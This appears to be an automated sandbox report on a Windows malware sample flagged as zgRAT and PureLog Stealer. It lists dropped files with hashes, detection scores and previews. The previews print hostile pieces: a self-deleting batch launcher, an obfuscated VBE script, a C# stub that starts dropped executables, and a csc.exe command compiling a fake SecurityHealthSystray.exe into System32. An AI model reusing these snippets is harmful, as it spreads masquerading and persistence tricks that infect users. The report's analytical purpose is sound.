                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):219
                                                                                            Entropy (8bit):5.2740951391146185
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:hCijTg3Nou1SV+DE1WD5tjO+v/GkbKOZG1wkn23fV4qRH:HTg9uYDEoE+vukffdjRH
                                                                                            MD5:F7D1DFE186B46D8CBE8DA1B93F6B57F9
                                                                                            SHA1:EB24D7D82E216C560F689373ECE0BB5D20396C41
                                                                                            SHA-256:93B33889B7F9494A68A564B17F50F96AD7ABD9434B0FE69AFE374A0DC5C39A1A
                                                                                            SHA-512:A9702515082B27B528A993F0D85D0E666EA2B7EA9618F3D3BAD7CBAC3AE7D8C4679C92B0B8E0E3A36156721D489021358024201115C672A0A94CAA41FC9FE58F
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\gMEBPrHPbx.bat"
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                            Category:dropped
                                                                                            Size (bytes):413
                                                                                            Entropy (8bit):5.069760832258539
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLexvukSiFkD:JNVQIbSfhV7TiFkMSfhCPFkD
                                                                                            MD5:67607BE86374B43070C8B7708B054E33
                                                                                            SHA1:C77DEBEAC6C37A3FB5E7929A165C09639291CF24
                                                                                            SHA-256:D97AC456514E0CEB74B7687C12F18392C0EA4A1F4EF3CFCADCEDD106C2F9C099
                                                                                            SHA-512:CA1871CF61B3210F7EDEF47B0272F6032945612ADD930DE82DA18045F1A58FCFF185EDE158847ED8ACB034E40433EA8D3484202DA193402F3CF90E87AF4B7B63
                                                                                            Malicious:false
                                                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe"); } catch { } }).Start();. }.}.
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):250
                                                                                            Entropy (8bit):5.0654503615195
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fgqFIyLBH:Hu7L//TRq79cQWfI+jLx
                                                                                            MD5:D59F7FE577D0D3A5BD463DCB30D69EA2
                                                                                            SHA1:7CCA45FA81463A83CCEA65DF7486B1FCBA45A58C
                                                                                            SHA-256:05C18A07A3614B94491EFF9DE639C250227CD7F2DE86D178C1846266633EA1FC
                                                                                            SHA-512:5B1C2555E291020CF938761C9919BA8C7D976306D91A24F22BEB6021322A2B386526E960DFFA63BFDBB161E40215C55414D6B3C1E9057681EACB3336E9A8DD87
                                                                                            Malicious:true
                                                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.0.cs"
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):750
                                                                                            Entropy (8bit):5.23872345578511
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:50fMI/u7L//TRq79cQWfI+jLUKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:5vI/un/Vq79tWfIqUKax5DqBVKVrdFAw
                                                                                            MD5:70EB0792F50BD1F3C35D41442AB289F9
                                                                                            SHA1:53A5F68A99CA108D7D7F40AA75931B12A3F4C11C
                                                                                            SHA-256:D51B2164A0C3B8F2DFD83FDE09D6E3A80180605E63B2A174BEA0CB54B6871C0C
                                                                                            SHA-512:55E4CD12963EDF47138E0206A33F6238DA9722D8CE1FE280E6E9D6A5712F0DF25E43765BDF6C748301DF35BE1373307845D41C92D56877F3766CDF2AEB12A45C
                                                                                            Malicious:false
                                                                                            Preview:.C:\hyperContaineragent> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):23552
                                                                                            Entropy (8bit):5.519109060441589
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: TGh6AUbQkh.exe, Detection: malicious, Browse
                                                                                            • Filename: k1iZHyRK6K.exe, Detection: malicious, Browse
                                                                                            • Filename: VfKk5EmvwW.exe, Detection: malicious, Browse
                                                                                            • Filename: cGZV10VyWC.exe, Detection: malicious, Browse
                                                                                            • Filename: PbfYaIvR5B.exe, Detection: malicious, Browse
                                                                                            • Filename: 9D7RwuJrth.exe, Detection: malicious, Browse
                                                                                            • Filename: qZoQEFZUnv.exe, Detection: malicious, Browse
                                                                                            • Filename: 01YP9Lwum8.exe, Detection: malicious, Browse
                                                                                            • Filename: w49A5FG3yg.exe, Detection: malicious, Browse
                                                                                            • Filename: 9XHFe6y4Dj.exe, Detection: malicious, Browse
                                                                                            Process:C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):32256
                                                                                            Entropy (8bit):5.631194486392901
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                                                            Process:C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):23552
                                                                                            Entropy (8bit):5.519109060441589
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):32256
                                                                                            Entropy (8bit):5.631194486392901
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):55
                                                                                            Entropy (8bit):4.306461250274409
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                            Malicious:false
                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:MSVC .res
                                                                                            Category:dropped
                                                                                            Size (bytes):1224
                                                                                            Entropy (8bit):4.435108676655666
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                            MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                            SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                            SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                            SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                            Malicious:false
                                                                                            Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):4608
                                                                                            Entropy (8bit):3.9831454801000206
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:6EJ7PtCM7Jt8Bs3FJsdcV4MKe27F7NeF+vqBHeOulajfqXSfbNtm:PPBPc+Vx9MzeQvk4cjRzNt
                                                                                            MD5:0542CB9F2AF7769384BD3C6527E8ED3F
                                                                                            SHA1:F3FC40E45DFE1DF65ED5A00CA8B016CA2818B5F1
                                                                                            SHA-256:FC7CEAE95ED6D460F90E3CA30E004B47D05038429F84DE1C2E7A030AC4AB67C2
                                                                                            SHA-512:18B2B75FC95699CF3DE131531494219811FEBAA4054E8D213FD0AB61B41FA80188912E952EFA4280FA30B62A453A17205CC19D11017A7C2B95AAAB320F1F95AC
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....*g.............................'... ...@....@.. ....................................@.................................|'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..T.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.$.......#GUID...4... ...#Blob...........WU........%3................................................................
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:ASCII text, with very long lines (597), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):597
                                                                                            Entropy (8bit):5.875007232727717
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:Bwm8jx1jaZS6a3I5Aw2CNSAkQd7RtnSV65QnJYJTKlU9EUIHPB7P+j/kZfjnuQG:BbQx1m46aIW99QXtnSVgQCCiIvlo/mHG
                                                                                            MD5:033CBC5BE644E75CC4210A1936066C0F
                                                                                            SHA1:ACD2A5C7D2D0C8833BF87D70E94C6C588FFCA7DD
                                                                                            SHA-256:996E851A841C41F059AE5C68CB8A249DFEC5B63745C9E2CAFDF0593DED38B2DF
                                                                                            SHA-512:76DA00E9426293D0800639F6339D2799D421459034FEB35E2DE599C1C9DB946C845445E5365D2BCDC11D5DDC4BBDE6E5EF9C42B1C06242482210AF7135A4F889
                                                                                            Malicious:false
                                                                                            Preview:5Ud1EDLZgc8GX8yyxkqRxVuygOTEbmVOBRzfOrxS71E3RCVIXgBYHSxjjoU0tG83GuFGITjGxYT5R0he2Lr4l7GseQ5kW6i13Kwg6P9D65kt81RsG07iYDSIoWm2Y9t0zcCHDBinLn7pWWum9Meg9Acz1o2jnHp7Lu3fyJoFSUWuGmwRm93LfN1zANPZI89E8AemdOxzhYOonrsO1l7nOdc72Dfl3P6TUSwGIJxXMDnG9NMSeBhhBWzehgtZtL5Sc4TV5mGrxjbK0V8p1MH2rZS8cSimaYnAIVoE30X15ztb5poMhEhhEClClV2nEdRZ6aCer3vAyP71p1DxnWEW0F5Fuldi7uxbiUeemJeoShtzEtXuSF9sY5i0f6uGaNCEcgTVWiKd1aDTWGAAOsP1uECmvo9qZYNEepXiaBYt5f181PdZ5t1s7KTXdqkrjdEcM9zrscjMUg6PNEufKkuqgfGTVAEubqKbbYv2awqdJoXbODJZ5Eh8tX6r2gVsXzvoVexzS1FY4Rg1HpER0pyXILsDcEA4a7FU3tFuQUHD8IEb1EjMbD2sAYfJvuXN1L76ML8YjUBghvYAHQLXfxcWF
                                                                                            Process:C:\Users\user\Desktop\3AAyq819Vy.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):232
                                                                                            Entropy (8bit):5.805230966581105
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:GpwqK+NkLzWbHw/JUrFnBaORbM5nCspsqnNkhn3+s:GcMCzWLVhBaORbQCsfNQN
                                                                                            MD5:321B2B59AD9C31CF688937AC999A85AF
                                                                                            SHA1:4E427AAA9F2EF8A56DA4C78BEF071C28DB269C36
                                                                                            SHA-256:5758FD0E39DC256B30ED578041CA918D92A69B9DF7E4AD7808A925619FDE3F85
                                                                                            SHA-512:2E77990658A9602E1DA837FBC4754F7629DF1B6FB6C0A41FB5A1250A924D30FA564C2B3C69C1582D0062244DA480E293EA906D30B4C04CC57016D7B3F3CA30E2
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:#@~^zwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFf!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z4Hw.DZKxDCk.+.lT+UOJzZI.1+qfx5JADVZ5%?.\UhqtIiITD-p.ISa (lOJB~Z~~6l^/+oEIAAA==^#~@.
                                                                                            Process:C:\Users\user\Desktop\3AAyq819Vy.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1719296
                                                                                            Entropy (8bit):7.457136013265021
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                                            MD5:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            SHA1:77DC3F7D83728294C49298DB82DD0E668ADC3A73
                                                                                            SHA-256:8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                                                                                            SHA-512:4AC940FA7CE3C8A2A646639A5B00C5C8A1DCAFCFBA460782068446A321455CF5AF10E1E6AE4E6753150BEAB7D2431A7C38192787B32C4E508B73F4B3AC843956
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%!g.................4..........~R... ...`....@.. ....................................@.................................0R..K....`.. ............................................................................ ............... ..H............text....2... ...4.................. ..`.rsrc... ....`.......6..............@....reloc...............:..............@..B................`R......H.......................L...Hq...Q.......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8y......0.......... ........8........E....d.......*...............8_......... ....~....{....9....& ....8....~....(S... .... .... ....s....~....(W....... ........8{...8.... ....~....{....:f...& ....8[...~....:V... ....8G.......~....([...~....(_
                                                                                            Process:C:\Users\user\Desktop\3AAyq819Vy.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):83
                                                                                            Entropy (8bit):5.163842744443543
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:jlWN0AWAIAT0+VAXZAXrNw3QJA9xvbA:QzW/ATxq5gO9JbA
                                                                                            MD5:DF218C1160A79B119167D4DD812857EA
                                                                                            SHA1:E0ADECE134E3AB420A5EB152B98F89F8B15399BB
                                                                                            SHA-256:E5CF111B8B8722E4C2EF307E6DE857530B48EA2C52A18819424BBBEB8F23A0DB
                                                                                            SHA-512:AEAEFBBAEE7DA588E16FF9F6928B001ED9CFCFA60FE54705F5C4705526B010039A92C6DD34DAB4B592E5D24A044525E5E2C3BA4B4ACAC7D07C10F7E4C5488F17
                                                                                            Malicious:false
                                                                                            Preview:%PMdHrshNEIwIs%%kQh%..%qHF%"C:\hyperContaineragent/Bridgecommon.exe"%XTZACTmyNVfJf%
                                                                                            Process:C:\Windows\System32\w32tm.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):151
                                                                                            Entropy (8bit):4.858390206609163
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:VLV993J+miJWEoJ8FXI68TLdC8TJ8XKNvofvVXXKvj:Vx993DEUTtTLdlTJodXs
                                                                                            MD5:ADE61FE508677B525C9590B64C63A558
                                                                                            SHA1:99DD2A67E583F209FA203DAB181EF28E5769A8DB
                                                                                            SHA-256:9E9FE7655CE202D2B94A164808DEDE0E2BE66476F17AFD5C4D0829A7294727B0
                                                                                            SHA-512:F3ECB7BB143487738DF6961FD8C716185D05B411DB740452D1CF1693D5C52093C0521ABBBCD2970CE950E267BDF48A3E09EEEE4F8F2AC152B7B61A7282C9FC99
                                                                                            Malicious:false
                                                                                            Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 05/11/2024 19:52:16..19:52:16, error: 0x80072746.19:52:21, error: 0x80072746.
                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.3994346134560915
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:3AAyq819Vy.exe
                                                                                            File size:2'041'114 bytes
                                                                                            MD5:059dd6a8cb2d31871bb82dbb158965fa
                                                                                            SHA1:10507debf7b1a88791b65fc08a5b995f9b873aee
